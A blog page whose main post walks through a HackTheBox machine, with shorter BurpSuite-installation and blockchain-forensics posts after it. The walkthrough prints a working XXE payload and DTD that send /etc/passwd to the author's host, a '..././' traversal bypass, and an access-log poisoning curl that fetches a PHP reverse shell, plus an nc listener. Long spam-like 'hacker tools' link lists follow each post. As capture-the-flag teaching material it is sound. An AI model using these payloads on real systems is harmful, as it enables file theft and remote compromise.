Wednesday, May 31, 2023

XXE In Docx Files And LFI To RCE


In this article we are going to talk about XXE injection and we will also look at LFI in a little more advanced perspective. I will be performing both of these attacks on a HackTheBox machine called Patents which was a really hard machine. I am not going to show you how to solve the Patents machine rather I will show you how to perform the above mentioned attacks on the box.

XML External Entity Attack

Lets start with what an XXE injection means. OWASP has put XXE on number 4 of OWASP Top Ten 2017 and describes XXE in the following words: "An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts."
What that means is if you have an XML parser which is not properly configured to parse the input data you may end you getting yourself screwed. On the Patents box there is an upload form which lets us upload a word document (docx) and then parses it to convert it into a pdf document. You may be thinking but where is the XML document involved here. Well it turns out that the docx files are made up of multiple XML documents archived together. Read more about it in the article OpenXML in word processing – Custom XML part – mapping flat data. It turns out that the docx2pdf parser of the Patents machine is poorly configured to allow XXE injection attacks but to perform that attack we need to inject out XXE payload in the docx file. First lets upload a simple docx file to the server and see what happens.

After uploading the file we get a Download option to download the pdf file that was created from our docx file.

As can be seen, the functionality works as expected.

Now lets exploit it. What we have to do is that we have to inject our XXE payload in the docx file so that the poorly configured XML parser on the server parses our payload and allows us to exfil data from the server. To do that we will perform these steps.
  1. Extract the docx file.
  2. Embed our payload in the extracted files.
  3. Archive the file back in the docx format.
  4. Upload the file on the server.
To extract the docx file we will use the unzip Linux command line tool.
mkdir doc cd doc unzip ../sample.docx 
Following the article mentioned above we see that we can embed custom XML to the docx file by creating a directory (folder) called customXml inside the extracted folder and add an item1.xml file which will contain our payload.
mkdir customXml cd customXml vim item1.xml 
Lets grab an XXE payload from PayloadsAllTheThings GitHub repo and modify it a bit which looks like this:
<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://10.10.14.56:8090/dtd.xml"> %sp; %param1; ]> <r>&exfil;</r> 
Notice the IP address in the middle of the payload, this IP address points to my python server which I'm going to host on my machine shortly on port 8090. The contents of the dtd.xml file that is being accessed by the payload is:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.56:8090/dtd.xml?%data;'>"> 
What this xml file is doing is that it is requesting the /etc/passwd file on the local server of the XML parser and then encoding the contents of /etc/passwd into base64 format (the encoding is done because that contents of the /etc/passwd file could be something that can break the request). Now lets zip the un-archived files back to the docx file using the zip linux command line tool.
zip -r sample.docx * 
here -r means recursive and * means all files sample.docx is the output file.
Lets summarize the attack a bit before performing it. We created a docx file with an XXE payload, the payload will ping back to our server looking for a file named dtd.xml. dtd.xml file will be parsed by the XML parser on the server in the context of the server. Grabbing the /etc/passwd file from the server encoding it using base64 and then sends that base64 encoded data back to us in the request.
Now lets fire-up our simple http python server in the same directory we kept our dtd.xml file:
python -m SimpleHTTPServer 8090 
and then upload the file to the server and see if it works.
We got a hit on our python server from the target server looking for the dtd.xml file and we can see a 200 OK besides the request.
Below the request for dtd.xml we can see another request which was made by the target server to our server and appended to the end of this request is the base64 encoded data. We grab everything coming after the ? of the request and copy it to a file say passwd.b64 and after that we use the base64 linux command line tool to decode the base64 data like this:
cat passwd.64 | base64 -d > passwd
looking at the contents of passwd file we can confirm that it is indeed the /etc/passwd file from the target server. Now we can exfiltrate other files as well from the server but remember we can only exfiltrate those files from the server to which the user running the web application has read permissions. To extract other files we simple have to change the dtd.xml file, we don't need to change our docx file. Change the dtd.xml file and then upload the sample.docx file to the server and get the contents of another file.

LFI to RCE

Now getting to the part two of the article which is LFI to RCE, the box is also vulnerable to LFI injection you can read about simple LFI in one of my previous article Learning Web Pentesting With DVWA Part 6: File Inclusion, in this article we are going a bit more advanced. The URL that is vulnerable to LFI on the machine is:
http://10.10.10.173/getPatent_alphav1.0.php 

We can use the id parameter to view the uploaded patents like this:
http://10.10.10.173/getPatent_alphav1.0.php?id=1 

The patents are basically local document files on the server, lets try to see if we can read other local files on the server using the id parameter. We try our LFI payloads and it doesn't seem to work.

Maybe its using a mechanism to prevent LFI attacks. After reading the source for getPatent_alphav1.0.php from previous vulnerability we can see it is flagging ../ in the request. To bypass that restriction we will use ..././, first two dots and the slash will be removed from ..././ and what will be left is ../, lets try it out:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././etc/passwd 

Wohoo! we got it but now what? To get an RCE we will check if we can access the apache access log file
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log 
As we can see we are able to access the apache access log file lets try to get an RCE via access logs. How this works is basically simple, the access.log file logs all the access requests to the apache server. We will include php code in our request to the server, this malicious request will be logged in the access.log file. Then using the LFI we will access the access.log file. As we access the access.log file via the LFI, the php code in our request will be executed and we will have an RCE. First lets grab a php reverse shell from pentest monkey's GitHub repo, modify the ip and port variables  to our own ip and port, and put it into the directory which our python server is hosting. I have renamed the file to shell.php for simplicity here.
Lets setup our reverse shell listener:
nc -lvnp 9999 
and then perfrom a request to the target server with our php code like this:
curl "http://10.10.10.173/<?php system('curl\$\{IFS\}http://10.10.14.56:8090/shell.php');?>" 
and lastly lets access the apache access.log file via the LFI on the target server:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log3 
Boom! we have a shell.

That's it for today's article see you next time.

References

Related news

Snmpcheck


"snmpcheck is a free open source utility to get information via SNMP protocols. It works fine against Windows, Linux, Cisco, HP-UX, SunOS systems and any devices with SNMP protocol support. It could be useful for penetration testing or systems monitoring. snmpcheck has been tested on GNU/Linux, *BSD, Windows systems and Cygwin. snmpcheck is distributed under GPL license and based on Athena-2k script by jshaw. " read more...

Website: http://www.nothink.org/perl/snmpcheck


More articles


  1. Hacker Tools For Pc
  2. Nsa Hacker Tools
  3. Hacking Tools Github
  4. Bluetooth Hacking Tools Kali
  5. Pentest Tools Review
  6. Underground Hacker Sites
  7. Install Pentest Tools Ubuntu
  8. Usb Pentest Tools
  9. Hacker Techniques Tools And Incident Handling
  10. Hacking Tools And Software
  11. Pentest Tools Website
  12. Hacker Tools Apk
  13. Hacker Tools Hardware
  14. Usb Pentest Tools
  15. Hacker Techniques Tools And Incident Handling
  16. Blackhat Hacker Tools
  17. Hacker
  18. Hack Tools
  19. Hacking Tools Pc
  20. Pentest Tools Android
  21. Hak5 Tools
  22. Hack Tools For Ubuntu
  23. What Are Hacking Tools
  24. Hacker
  25. Hacking Tools Usb
  26. Hacker Hardware Tools
  27. Hack Tools Pc
  28. Hacking Tools 2019
  29. Game Hacking
  30. Pentest Tools For Windows
  31. Pentest Tools For Ubuntu
  32. Pentest Tools Bluekeep
  33. Hack Tools Online
  34. Hak5 Tools
  35. Pentest Recon Tools
  36. Hacker Tools Github
  37. Pentest Tools For Ubuntu
  38. Pentest Tools Website Vulnerability
  39. Hack Rom Tools
  40. Game Hacking
  41. Hacking Tools Free Download
  42. Pentest Tools Alternative
  43. Hack And Tools
  44. Game Hacking
  45. Hacking Tools For Games
  46. Pentest Tools Open Source
  47. Pentest Tools Download
  48. Hacking Tools 2020
  49. Hack Tools Pc
  50. Pentest Tools Linux
  51. Hackrf Tools
  52. Pentest Tools Review
  53. Hacker Tools For Windows
  54. Hack Tools Online
  55. Pentest Box Tools Download
  56. Hack Tools For Pc
  57. Beginner Hacker Tools
  58. Hacker Tools Free
  59. Hacker Tools For Mac
  60. Hacker Tools Apk
  61. Wifi Hacker Tools For Windows
  62. Hacker Tools For Mac
  63. Tools Used For Hacking
  64. Hack Tools 2019
  65. World No 1 Hacker Software
  66. Pentest Tools Website Vulnerability
  67. Hacker Tools For Pc
  68. Hack Tools For Games
  69. Wifi Hacker Tools For Windows
  70. Hack App
  71. Hacker Tools
  72. Hacking Apps
  73. Hack Tool Apk
  74. Beginner Hacker Tools
  75. Pentest Tools Tcp Port Scanner
  76. Hacking Tools For Windows
  77. Hack Tools Mac
  78. Ethical Hacker Tools
  79. Top Pentest Tools
  80. Ethical Hacker Tools
  81. Hacking Tools Kit
  82. Wifi Hacker Tools For Windows
  83. Hacking Tools For Windows 7
  84. Hack Tools 2019
  85. What Is Hacking Tools
  86. Game Hacking
  87. Hacker Tools List
  88. Nsa Hacker Tools
  89. Hacker Tools Hardware
  90. Hacker Tools Hardware
  91. Hacking Tools For Windows 7
  92. Pentest Tools Kali Linux
  93. Hacking Tools 2020
  94. Hacker Tools For Mac
  95. Hacker Tools Free Download
  96. How To Install Pentest Tools In Ubuntu
  97. Pentest Tools Website Vulnerability
  98. How To Install Pentest Tools In Ubuntu
  99. Hack Rom Tools
  100. Hacking Tools For Windows Free Download
  101. Nsa Hacker Tools
  102. How To Hack
  103. Pentest Tools Port Scanner
  104. Best Hacking Tools 2019
  105. Best Hacking Tools 2020
  106. New Hacker Tools
  107. Nsa Hacker Tools
  108. Pentest Tools Find Subdomains
  109. Pentest Tools For Ubuntu
  110. Best Pentesting Tools 2018
  111. Pentest Tools Website Vulnerability
  112. Pentest Tools Windows
  113. Hacking Tools And Software
  114. Nsa Hack Tools
  115. Growth Hacker Tools
  116. Pentest Tools Windows
  117. Hacking Tools For Windows
  118. Hacker Security Tools
  119. Hacker Tools Hardware
  120. Hack Tools Pc
  121. Hak5 Tools
  122. Install Pentest Tools Ubuntu
  123. Hacker Tools Hardware
  124. Pentest Tools Subdomain
  125. Hack Tools
  126. Blackhat Hacker Tools
  127. Nsa Hacker Tools
  128. Hacker Tool Kit
  129. Hacker Tools For Windows
  130. Pentest Tools For Android
  131. Hacker Tools Hardware
  132. Hacking Tools 2019
  133. Hacking App
  134. Hacking App
  135. Hacker Security Tools
  136. Pentest Tools List
  137. Game Hacking
  138. Hacker Tools Software
  139. Hacking Tools
  140. Hacking Tools Name
  141. Hacking Tools Windows
  142. Nsa Hack Tools Download
  143. Pentest Tools Online
  144. Hacking Tools Online
  145. Kik Hack Tools
  146. Hacking Tools Software
  147. Install Pentest Tools Ubuntu
  148. Pentest Box Tools Download
  149. Hackrf Tools
  150. Hacker Security Tools
  151. Pentest Tools Website Vulnerability
  152. Hacker Tools For Pc
  153. Blackhat Hacker Tools
  154. Hacking Tools Online
  155. Pentest Tools Github
  156. Hacker Tools Online
  157. Pentest Reporting Tools
  158. Ethical Hacker Tools
  159. Hack Tools Online
  160. Hacking Tools Usb
  161. Underground Hacker Sites
  162. Hack Tools For Pc
  163. Hacker
  164. Hacker Tools Github

Tuesday, May 30, 2023

BurpSuite Introduction & Installation



What is BurpSuite?
Burp Suite is a Java based Web Penetration Testing framework. It has become an industry standard suite of tools used by information security professionals. Burp Suite helps you identify vulnerabilities and verify attack vectors that are affecting web applications. Because of its popularity and breadth as well as depth of features, we have created this useful page as a collection of Burp Suite knowledge and information.

In its simplest form, Burp Suite can be classified as an Interception Proxy. While browsing their target application, a penetration tester can configure their internet browser to route traffic through the Burp Suite proxy server. Burp Suite then acts as a (sort of) Man In The Middle by capturing and analyzing each request to and from the target web application so that they can be analyzed.











Everyone has their favorite security tools, but when it comes to mobile and web applications I've always found myself looking BurpSuite . It always seems to have everything I need and for folks just getting started with web application testing it can be a challenge putting all of the pieces together. I'm just going to go through the installation to paint a good picture of how to get it up quickly.

BurpSuite is freely available with everything you need to get started and when you're ready to cut the leash, the professional version has some handy tools that can make the whole process a little bit easier. I'll also go through how to install FoxyProxy which makes it much easier to change your proxy setup, but we'll get into that a little later.

Requirements and assumptions:

Mozilla Firefox 3.1 or Later Knowledge of Firefox Add-ons and installation The Java Runtime Environment installed

Download BurpSuite from http://portswigger.net/burp/download.htmland make a note of where you save it.

on for Firefox from   https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/


If this is your first time running the JAR file, it may take a minute or two to load, so be patient and wait.


Video for setup and installation.




You need to install compatible version of java , So that you can run BurpSuite.

Related news


  1. How To Make Hacking Tools
  2. Hacking Tools For Pc
  3. Hacker Tools Free
  4. Hacker Tools For Pc
  5. Physical Pentest Tools
  6. Hack Tools 2019
  7. Hacking App
  8. Hack Tools Online
  9. Hacker Search Tools
  10. Hacker Tools Github
  11. Hacker Tools Apk Download
  12. Hack Tools Online
  13. Hacking Tools Name
  14. Pentest Tools Open Source
  15. Easy Hack Tools
  16. Install Pentest Tools Ubuntu
  17. Hacking Tools For Games
  18. Hackers Toolbox
  19. Free Pentest Tools For Windows
  20. Usb Pentest Tools
  21. Hacker Techniques Tools And Incident Handling
  22. Tools 4 Hack
  23. Hacking Tools For Kali Linux
  24. Underground Hacker Sites
  25. Hack Tools 2019
  26. Hacker Tools Github
  27. Hacking Tools Free Download
  28. How To Make Hacking Tools
  29. Hacker Tools Online
  30. Beginner Hacker Tools
  31. Hacking Tools
  32. Nsa Hack Tools Download
  33. Best Hacking Tools 2020
  34. Nsa Hack Tools Download
  35. Hacker Tools Hardware
  36. Pentest Box Tools Download
  37. Hack Tools For Pc
  38. Best Hacking Tools 2019
  39. Github Hacking Tools
  40. Hack Rom Tools
  41. Pentest Tools List
  42. Pentest Tools Url Fuzzer
  43. Pentest Tools Alternative
  44. Easy Hack Tools
  45. Pentest Tools Apk
  46. Bluetooth Hacking Tools Kali
  47. Hacker Tools For Pc
  48. Hacking Tools And Software
  49. Underground Hacker Sites
  50. What Are Hacking Tools
  51. Hack Tools Pc
  52. Pentest Tools Free
  53. Hacker Techniques Tools And Incident Handling
  54. Hack Tools For Mac
  55. Pentest Tools Alternative
  56. Hacker Tools Online
  57. Pentest Tools Framework
  58. Hack Tools For Ubuntu
  59. Pentest Recon Tools
  60. Hacking Tools 2020
  61. Nsa Hack Tools
  62. Hackers Toolbox
  63. Pentest Tools For Mac
  64. Pentest Tools Windows
  65. World No 1 Hacker Software
  66. Hacker Tools Github
  67. Hack Tools Pc
  68. New Hack Tools
  69. Hack Website Online Tool
  70. How To Install Pentest Tools In Ubuntu
  71. Hacking Tools Download
  72. Hack Tools
  73. Kik Hack Tools
  74. Pentest Tools Url Fuzzer

Blockchain Forensics R&D With Python - Tracking Attackers, Etherscan API Usage, Python Coding, Signature Lookups And Decompiling Bytecode

 Added a new playlist over the last few weeks, its up to about 8 videos now which starts out writing code to monitor attackers address changes on the blockchain followed by using EtherScan API's to track some movements and make sense of things with a few other learning points along the way...   

There is one pre-requisite video however which is where this series came from which is another video I created where we took apart a smart contract from a YouTube scam to find the attackers malicious code, so review that first below: 

Twitter: @ficti0n
Web: http://cclabs.io/


If you learn something from this blog/video consider sharing it on your social media or retweeting my posts.


Here is the Pre-Requisite Video to this series Which does a smart contract audit of a malicious front running bot: 



Here is the new playlist series which digs into tracking this attacker: 


Link to full Playlist since blogger is not letting me embed the playlist: 
https://www.youtube.com/playlist?list=PLCwnLq3tOElrUdIg4LgdhPhCKAiy7NZYA




Intro to the playlist: 


 

Related links